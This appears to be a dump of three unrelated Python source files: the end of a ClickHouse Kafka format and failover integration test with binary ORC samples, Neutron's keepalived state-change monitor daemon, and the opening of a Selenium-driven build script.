01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x0f\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x7e\x25\x0e\x2e\x46\x43\x21\x46\x4b\x09\xad\x00\x06\x00\x33\x00\x00\x0a\x17\x0a\x03\x00\x00\x00\x12\x10\x08\x0f\x22\x0a\x0a\x02\x41\x4d\x12\x02\x41\x4d\x18\x3c\x50\x00\x3a\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x7e\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x66\x73\x3d\xd3\x00\x06\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x02\x10\x02\x18\x1e\x50\x00\x05\x00\x00\x0c\x00\x2b\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38\x39\x31\x30\x31\x31\x31\x32\x31\x33\x31\x34\x31\x35\x09\x00\x00\x06\x01\x03\x02\x09\x00\x00\xc0\x0e\x00\x00\x07\x00\x00\x42\x00\x80\x05\x00\x00\x41\x4d\x0a\x00\x00\xe3\xe2\x42\x01\x00\x09\x00\x00\xc0\x0e\x02\x00\x05\x00\x00\x0c\x01\x94\x00\x00\x2d\xca\xc1\x0e\x80\x30\x08\x03\xd0\xc1\x60\x2e\xf3\x62\x76\x6a\xe2\x0e\xfe\xff\x57\x5a\x3b\x0f\xe4\x51\xe8\x68\xbd\x5d\x05\xe7\xf8\x34\x40\x3a\x6e\x59\xb1\x64\xe0\x91\xa9\xbf\xb1\x97\xd2\x95\x9d\x1e\xca\x55\x3a\x6d\xb4\xd2\xdd\x0b\x74\x9a\x74\xf7\x12\x39\xbd\x97\x7f\x7c\x06\xbb\xa6\x8d\x97\x17\xb4\x00\x00\xe3\x4a\xe6\x62\xe1\xe0\x0f\x60\xe0\xe2\xe3\xe0\x17\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\xe0\x57\xe2\xe0\x62\x34\x14\x62\xb4\x94\xd0\x02\x8a\xc8\x73\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\xc2\x06\x28\x26\xc4\x25\xca\xc1\x6f\xc4\xcb\xc5\x68\x20\xc4\x6c\xa0\x67\x2a\xc5\x6c\xae\x67\x0a\x14\xe6\x87\x1a\xc6\x24\xc0\x24\x21\x07\x32\x0c\x00\x4a\x01\x00\xe3\x60\x16\x58\xc3\x24\xc5\xcd\xc1\x2c\x30\x89\x51\xc2\x4b\xc1\x57\x83\x5f\x49\x83\x83\x47\x88\x95\x91\x89\x99\x85\x55\x8a\x3d\x29\x27\x3f\x39\xdb\x2f\x5f\x8a\x29\x33\x45\x8a\xa5\x2c\x31\xc7\x10\x4c\x1a\x81\x49\x63\x25\x26\x0e\x46\x20\x66\x07\x63\x36\x0e\x3e\x0d\x26\x03\x10\x9f\xd1\x80\xdf\x8a\x85\x83\x3f\x80\xc1\x8a\x8f\x83\x5f\x88\x8d\x83\x41\x80\x41\x82\x21\x80\x21\x82\xd5\x4a\x80\x83\x5f\x89\x83\x8b\xd1\x50\x88\xd1\x52\x42\x0b\x28\x22\x6f\x25\x04\x14\xe1\xe2\x62\x72\xf4\x15\x02\x62\x09\x1b\xa0\x98\x90\x95\x28\x07\xbf\x11\x2f\x17\xa3\x81\x10\xb3\x81\x9e\xa9\x14\xb3\xb9\x9e\x29\x50\x98\x1f\x6a\x18\x93\x00\x93\x84\x1c\xc8\x30\x87\x09\x7e\x1e\x0c\x00\x08\xa8\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x5d\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
# broken message
b'\x4f\x52\x43\x0a\x0b\x0a\x03\x00\x00\x00\x12\x04\x08\x01\x50\x00\x0a\x15\x0a\x05\x00\x00\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x0a\x12\x0a\x06\x00\x00\x00\x00\x00\x00\x12\x08\x08\x01\x42\x02\x08\x06\x50\x00\x0a\x12\x0a\x06\x00\x00\x00\x00\x00\x00\x12\x08\x08\x01\x42\x02\x08\x04\x50\x00\x0a\x29\x0a\x04\x00\x00\x00\x00\x12\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\x00\x00\x00\x00\x00\x00\xe0\x3f\x50\x00\x0a\x15\x0a\x05\x00\x00\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\xff\x80\xff\x80\xff\x00\xff\x80\xff\x03\x42\x41\x44\xff\x80\xff\x02\x41\x4d\xff\x80\x00\x00\x00\x3f\xff\x80\xff\x01\x0a\x06\x08\x06\x10\x00\x18\x0d\x0a\x06\x08\x06\x10\x01\x18\x17\x0a\x06\x08\x06\x10\x02\x18\x14\x0a\x06\x08\x06\x10\x03\x18\x14\x0a\x06\x08\x06\x10\x04\x18\x2b\x0a\x06\x08\x06\x10\x05\x18\x17\x0a\x06\x08\x00\x10\x00\x18\x02\x0a\x06\x08\x00\x10\x01\x18\x02\x0a\x06\x08\x01\x10\x01\x18\x02\x0a\x06\x08\x00\x10\x02\x18\x02\x0a\x06\x08\x02\x10\x02\x18\x02\x0a\x06\x08\x01\x10\x02\x18\x03\x0a\x06\x08\x00\x10\x03\x18\x02\x0a\x06\x08\x02\x10\x03\x18\x02\x0a\x06\x08\x01\x10\x03\x18\x02\x0a\x06\x08\x00\x10\x04\x18\x02\x0a\x06\x08\x01\x10\x04\x18\x04\x0a\x06\x08\x00\x10\x05\x18\x02\x0a\x06\x08\x01\x10\x05\x18\x02\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x1a\x03\x47\x4d\x54\x0a\x59\x0a\x04\x08\x01\x50\x00\x0a\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x0a\x08\x08\x01\x42\x02\x08\x06\x50\x00\x0a\x08\x08\x01\x42\x02\x08\x04\x50\x00\x0a\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\x00\x00\x00\x00\x00\x00\xe0\x3f\x50\x00\x0a\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x08\x03\x10\xec\x02\x1a\x0c\x08\x03\x10\x8e\x01\x18\x1d\x20\xc1\x01\x28\x01\x22\x2e\x08\x0c\x12\x05\x01\x02\x03\x04\x05\x1a\x02\x69\x64\x1a\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x1a\x04\x76\x61\x6c\x31\x1a\x04\x76\x61\x6c\x32\x1a\x04\x76\x61\x6c\x33\x20\x00\x28\x00\x30\x00\x22\x08\x08\x04\x20\x00\x28\x00\x30\x00\x22\x08\x08\x08\x20\x00\x28\x00\x30\x00\x22\x08\x08\x08\x20\x00\x28\x00\x30\x00\x22\x08\x08\x05\x20\x00\x28\x00\x30\x00\x22\x08\x08\x01\x20\x00\x28\x00\x30\x00\x30\x01\x3a\x04\x08\x01\x50\x00\x3a\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x3a\x08\x08\x01\x42\x02\x08\x06\x50\x00\x3a\x08\x08\x01\x42\x02\x08\x04\x50\x00\x3a\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\x00\x00\x00\x00\x00\x00\xe0\x3f\x50\x00\x3a\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x40\x90\x4e\x48\x01\x08\xd5\x01\x10\x00\x18\x80\x80\x04\x22\x02\x00\x0b\x28\x5b\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
],
'expected':r'''{"raw_message":"4F52430A0B0A030000001204080150000A150A050000000000120C0801120608001000180050000A120A06000000000000120808014202080650000A120A06000000000000120808014202080450000A290A0400000000122108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50000A150A050000000000120C080112060802100218025000FF80FF80FF00FF80FF03424144FF80FF02414DFF800000003FFF80FF010A0608061000180D0A060806100118170A060806100218140A060806100318140A0608061004182B0A060806100518170A060800100018020A060800100118020A060801100118020A060800100218020A060802100218020A060801100218030A060800100318020A060802100318020A060801100318020A060800100418020A060801100418040A060800100518020A060801100518021204080010001204080010001204080010001204080010001204080010001204080010001A03474D540A590A04080150000A0C0801120608001000180050000A0808014202080650000A0808014202080450000A2108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50000A0C080112060802100218025000080310EC021A0C0803108E01181D20C1012801222E080C120501020304051A0269641A07626C6F636B4E6F1A0476616C311A0476616C321A0476616C33200028003000220808042000280030002208080820002800300022080808200028003000220808052000280030002208080120002800300030013A04080150003A0C0801120608001000180050003A0808014202080650003A0808014202080450003A2108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50003A0C08011206080210021802500040904E480108D5011000188080042202000B285B300682F403034F524318","error":"Cannot parse string 'BAD' as UInt16: syntax error at begin of string. Note: there are toUInt16OrZero and toUInt16OrNull functions, which returns zero\/NULL instead of throwing exception."}''',
'printable':False,
}
}
topic_name_prefix = 'format_tests_4_stream_'
for format_name, format_opts in list(all_formats.items()):
print(('Set up {}'.format(format_name)))
topic_name = topic_name_prefix + '{}'.format(format_name)
data_sample = format_opts['data_sample']
data_prefix = []
raw_message = '_raw_message'
# prepend empty value when supported
if format_opts.get('supports_empty_value', False):
data_prefix = data_prefix + ['']
if format_opts.get('printable', False) == False:
raw_message = 'hex(_raw_message)'
kafka_produce(kafka_cluster, topic_name, data_prefix + data_sample)
instance.query('''
DROP TABLE IF EXISTS test.kafka_{format_name};
CREATE TABLE test.kafka_{format_name} (
id Int64,
blockNo UInt16,
val1 String,
val2 Float32,
val3 UInt8
) ENGINE = Kafka()
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}',
kafka_format = '{format_name}',
kafka_handle_error_mode = 'stream',
kafka_flush_interval_ms = 1000 {extra_settings};
DROP TABLE IF EXISTS test.kafka_data_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_data_{format_name}_mv Engine=Log AS
SELECT *, _topic, _partition, _offset FROM test.kafka_{format_name}
WHERE length(_error) = 0;
DROP TABLE IF EXISTS test.kafka_errors_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_errors_{format_name}_mv Engine=Log AS
SELECT {raw_message} as raw_message, _error as error, _topic as topic, _partition as partition, _offset as offset FROM test.kafka_{format_name}
WHERE length(_error) > 0;
'''.format(topic_name=topic_name, format_name=format_name, raw_message=raw_message,
extra_settings=format_opts.get('extra_settings') or ''))
for format_name, format_opts in list(all_formats.items()):
print(('Checking {}'.format(format_name)))
topic_name = topic_name_prefix + '{}'.format(format_name)
# shift offsets by 1 if format supports empty value
offsets = [1, 2, 3] if format_opts.get('supports_empty_value', False) else [0, 1, 2]
result = instance.query('SELECT * FROM test.kafka_data_{format_name}_mv;'.format(format_name=format_name))
expected = '''\
0 0 AM 0.5 1 {topic_name} 0 {offset_0}
1 0 AM 0.5 1 {topic_name} 0 {offset_1}
2 0 AM 0.5 1 {topic_name} 0 {offset_1}
3 0 AM 0.5 1 {topic_name} 0 {offset_1}
4 0 AM 0.5 1 {topic_name} 0 {offset_1}
5 0 AM 0.5 1 {topic_name} 0 {offset_1}
6 0 AM 0.5 1 {topic_name} 0 {offset_1}
7 0 AM 0.5 1 {topic_name} 0 {offset_1}
8 0 AM 0.5 1 {topic_name} 0 {offset_1}
9 0 AM 0.5 1 {topic_name} 0 {offset_1}
10 0 AM 0.5 1 {topic_name} 0 {offset_1}
11 0 AM 0.5 1 {topic_name} 0 {offset_1}
12 0 AM 0.5 1 {topic_name} 0 {offset_1}
13 0 AM 0.5 1 {topic_name} 0 {offset_1}
14 0 AM 0.5 1 {topic_name} 0 {offset_1}
15 0 AM 0.5 1 {topic_name} 0 {offset_1}
0 0 AM 0.5 1 {topic_name} 0 {offset_2}
'''.format(topic_name=topic_name, offset_0=offsets[0], offset_1=offsets[1], offset_2=offsets[2])
# print(('Checking result\n {result} \n expected \n {expected}\n'.format(result=str(result), expected=str(expected))))
assert TSV(result) == TSV(expected), 'Proper result for format: {}'.format(format_name)
errors_result = instance.query('SELECT raw_message, error FROM test.kafka_errors_{format_name}_mv format JSONEachRow'.format(format_name=format_name))
errors_expected = format_opts['expected']
# print(errors_result.strip())
# print(errors_expected.strip())
assert errors_result.strip() == errors_expected.strip(), 'Proper errors for format: {}'.format(format_name)
def wait_for_new_data(table_name, prev_count = 0, max_retries = 120):
retries = 0
while True:
new_count = int(instance.query("SELECT count() FROM {}".format(table_name)))
print(new_count)
if new_count > prev_count:
return new_count
else:
retries += 1
time.sleep(0.5)
if retries > max_retries:
raise Exception("No new data :(")
def test_kafka_consumer_failover(kafka_cluster):
# for backporting:
# admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="kafka_consumer_failover", num_partitions=2, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.kafka2;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_consumer_failover',
kafka_group_name = 'kafka_consumer_failover_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1,
kafka_poll_timeout_ms = 200;
CREATE TABLE test.kafka2 (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_consumer_failover',
kafka_group_name = 'kafka_consumer_failover_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1,
kafka_poll_timeout_ms = 200;
CREATE TABLE test.kafka3 (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_consumer_failover',
kafka_group_name = 'kafka_consumer_failover_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1,
kafka_poll_timeout_ms = 200;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.kafka_mv TO test.destination AS
SELECT key, value, 'kafka' as _consumed_by
FROM test.kafka;
CREATE MATERIALIZED VIEW test.kafka2_mv TO test.destination AS
SELECT key, value, 'kafka2' as _consumed_by
FROM test.kafka2;
CREATE MATERIALIZED VIEW test.kafka3_mv TO test.destination AS
SELECT key, value, 'kafka3' as _consumed_by
FROM test.kafka3;
''')
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(cluster.kafka_port), value_serializer=producer_serializer, key_serializer=producer_serializer)
## all 3 attached, 2 working
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':1,'value': 1}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':1,'value': 1}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination')
## 2 attached, 2 working
instance.query('DETACH TABLE test.kafka')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':2,'value': 2}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':2,'value': 2}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 1 attached, 1 working
instance.query('DETACH TABLE test.kafka2')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':3,'value': 3}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':3,'value': 3}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 2 attached, 2 working
instance.query('ATTACH TABLE test.kafka')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':4,'value': 4}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':4,'value': 4}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 1 attached, 1 working
instance.query('DETACH TABLE test.kafka3')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':5,'value': 5}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':5,'value': 5}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 2 attached, 2 working
instance.query('ATTACH TABLE test.kafka2')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':6,'value': 6}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':6,'value': 6}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 3 attached, 2 working
instance.query('ATTACH TABLE test.kafka3')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':7,'value': 7}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':7,'value': 7}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 2 attached, same 2 working
instance.query('DETACH TABLE test.kafka3')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':8,'value': 8}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':8,'value': 8}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
if __name__ == '__main__':
cluster.start()
input("Cluster created, press any key to destroy...")
cluster.shutdown()
|
keepalived_state_change.py
|
# Copyright (c) 2015 Red Hat Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import queue
import sys
import threading
import httplib2
from oslo_config import cfg
from oslo_log import log as logging
from neutron._i18n import _
from neutron.agent.l3 import ha
from neutron.agent.linux import daemon
from neutron.agent.linux import ip_lib
from neutron.agent.linux import utils as agent_utils
from neutron.common import config
from neutron.common import utils as common_utils
from neutron.conf.agent.l3 import keepalived
from neutron import privileged
LOG = logging.getLogger(__name__)
INITIAL_STATE_READ_TIMEOUT = 10
class KeepalivedUnixDomainConnection(agent_utils.UnixDomainHTTPConnection):
def __init__(self, *args, **kwargs):
# Old style super initialization is required!
agent_utils.UnixDomainHTTPConnection.__init__(
self, *args, **kwargs)
self.socket_path = (
ha.L3AgentKeepalivedStateChangeServer.
get_keepalived_state_change_socket_path(cfg.CONF))
class MonitorDaemon(daemon.Daemon):
def __init__(self, pidfile, router_id, user, group, namespace, conf_dir,
interface, cidr):
self.router_id = router_id
self.namespace = namespace
self.conf_dir = conf_dir
self.interface = interface
self.cidr = cidr
self.monitor = None
self.event_stop = threading.Event()
self.event_started = threading.Event()
self.queue = queue.Queue()
self._initial_state = None
super(MonitorDaemon, self).__init__(pidfile, uuid=router_id,
user=user, group=group)
@property
def initial_state(self):
return self._initial_state
@initial_state.setter
def initial_state(self, state):
if not self._initial_state:
LOG.debug('Initial status of router %s is %s', self.router_id,
state)
self._initial_state = state
def run(self):
self._thread_initial_state = threading.Thread(
target=self.handle_initial_state)
self._thread_ip_monitor = threading.Thread(
target=ip_lib.ip_monitor,
args=(self.namespace, self.queue, self.event_stop,
self.event_started))
self._thread_read_queue = threading.Thread(
target=self.read_queue,
args=(self.queue, self.event_stop, self.event_started))
self._thread_initial_state.start()
self._thread_ip_monitor.start()
self._thread_read_queue.start()
# NOTE(ralonsoh): if the initial status is not read in a defined
# timeout, "backup" state is set.
self._thread_initial_state.join(timeout=INITIAL_STATE_READ_TIMEOUT)
if not self.initial_state:
LOG.warning('Timeout reading the initial status of router %s, '
'state is set to "backup".', self.router_id)
self.write_state_change('backup')
self.notify_agent('backup')
self._thread_read_queue.join()
def read_queue(self, _queue, event_stop, event_started):
event_started.wait()
while not event_stop.is_set():
try:
event = _queue.get(timeout=2)
except queue.Empty:
event = None
if not event:
continue
if event['name'] == self.interface and event['cidr'] == self.cidr:
if event['event'] == 'added':
new_state = 'primary'
else:
new_state = 'backup'
self.write_state_change(new_state)
self.notify_agent(new_state)
def handle_initial_state(self):
try:
state = 'backup'
cidr = common_utils.ip_to_cidr(self.cidr)
# NOTE(ralonsoh): "get_devices_with_ip" without passing an IP
# address performs one single pyroute2 command. Because the number
# of interfaces in the namespace is reduced, this is faster.
for address in ip_lib.get_devices_with_ip(self.namespace):
if (address['name'] == self.interface and
address['cidr'] == cidr):
state = 'primary'
break
if not self.initial_state:
self.write_state_change(state)
self.notify_agent(state)
except Exception:
if not self.initial_state:
LOG.exception('Failed to get initial status of router %s',
self.router_id)
def write_state_change(self, state):
self.initial_state = state
with open(os.path.join(
self.conf_dir, 'state'), 'w') as state_file:
state_file.write(state)
LOG.debug('Wrote router %s state %s', self.router_id, state)
def notify_agent(self, state):
resp, content = httplib2.Http().request(
# Note that the message is sent via a Unix domain socket so that
# the URL doesn't matter.
'http://127.0.0.1/',
headers={'X-Neutron-Router-Id': self.router_id,
'X-Neutron-State': state},
connection_type=KeepalivedUnixDomainConnection)
if resp.status != 200:
raise Exception(_('Unexpected response: %s') % resp)
LOG.debug('Notified agent router %s, state %s', self.router_id, state)
def handle_sigterm(self, signum, frame):
self.event_stop.set()
self._thread_read_queue.join(timeout=5)
super(MonitorDaemon, self).handle_sigterm(signum, frame)
def configure(conf):
config.init(sys.argv[1:])
conf.set_override('log_dir', cfg.CONF.conf_dir)
conf.set_override('debug', True)
conf.set_override('use_syslog', True)
config.setup_logging()
privileged.default.set_client_mode(False)
def main():
keepalived.register_cli_l3_agent_keepalived_opts()
keepalived.register_l3_agent_keepalived_opts()
configure(cfg.CONF)
MonitorDaemon(cfg.CONF.pid_file,
cfg.CONF.router_id,
cfg.CONF.user,
cfg.CONF.group,
cfg.CONF.namespace,
cfg.CONF.conf_dir,
cfg.CONF.monitor_interface,
cfg.CONF.monitor_cidr).start()
|
sbuild.py
|
import yaml
import os
import sys
import time
import threading
from selenium import webdriver
###################################################
import serverutils.process
serverutils.process.VERBOSE = False
from serverutils.process import PopenProcess
###################################################
ANSI = {
"NONE" : "",
"BLACK" : '\033[30m',
"RED" : '\033[31m',
"GREEN" : '\033[32m',
"YELLOW" : '\033[33m',
"BLUE" : '\033[34m',
"MAGENTA" : '\033[35m',
"CYAN" : '\033[36m',
"WHITE" : '\033[37m',
"BRIGHTBLACK" : '\033[90m',
"BRIGHTRED" : '\033[91m',
"BRIGHTGREEN" : '\033[92m',
"BRIGHTYELLOW" : '\033[93m',
"BRIGHTBLUE" : '\033[94m',
"BRIGHTMAGENTA" : '\033[95m',
"BRIGHTCYAN" : '\033[96m',
"BRIGHTWHITE" : '\033[97m',
"ENDC" : '\033[0m',
"BOLD" : '\033[1m',
"UNDERLINE" : '\033[4m'
}
###################################################
browser = webdriver.Chrome()
browser.set_window_position(int(os.environ["BROWSER_WINDOW_LEFT"]), int(os.environ["BROWSER_WINDOW_TOP"]))
browser.set_window_size(int(os.environ["BROWSER_WINDOW_WIDTH"]), int(os.environ["BROWSER_WINDOW_HEIGHT"]))
browserinit = True
###################################################
def rf(path, default):
try:
return open(path).read()
except:
return default
def ry(path, default):
try:
return yaml.load(open(path))
except:
return default
def procreadline(sline):
print(sline)
def runcmd(cmd):
proc = PopenProcess(cmd, procreadline)
returncode = proc.wait_for_return_code()
return returncode
def getlastmod(path):
stat = os.stat(path)
return stat.st_mtime
###################################################
class BuildCommandFailedException(BaseException):
def __init__(self, rulename, cmd):
self.rulename = rulename
self.cmd = cmd
class BDep:
def __init__(self, path):
self.path = path
class BRule:
def __init__(self, name, rdef):
self.name = name
self.deps = []
for ddef in rdef["deps"]:
self.deps.append(BDep(ddef))
self.cmds = rdef["cmds"]
self.run = rdef.get("run", False)
self.color = rdef.get("color", "NONE")
self.restart = rdef.get("restart", False)
self.refresh = rdef.get("refresh", False)
class BTask:
def __init__(self, name, cmds, color = "NONE"):
self.name = name
self.cmds = cmds
self.color = color
self.proc = None
def procreadline(self, sline):
print(ANSI[self.color] + self.name + ANSI["ENDC"] + " > " + ANSI[self.color] + sline)
def procreaderror(self, sline):
print(ANSI[self.color] + self.name + ANSI["BRIGHTWHITE"] + " ! " + ANSI["BRIGHTRED"] + sline)
def run(self):
print(ANSI["GREEN"])
print("running task: {} {}".format(ANSI["BRIGHTGREEN"], self.name))
pargs = []
if len(self.cmds) > 1:
pargs = self.cmds[1:]
print("\n{}{}{} ".format(ANSI["BRIGHTRED"], "!", ANSI[self.color]), end = "")
self.proc = PopenProcess(
self.cmds[0],
self.procreadline,
read_error_callback = self.procreaderror,
proc_args = pargs,
ignore_cwd = True
)
def kill(self):
print(ANSI["RED"])
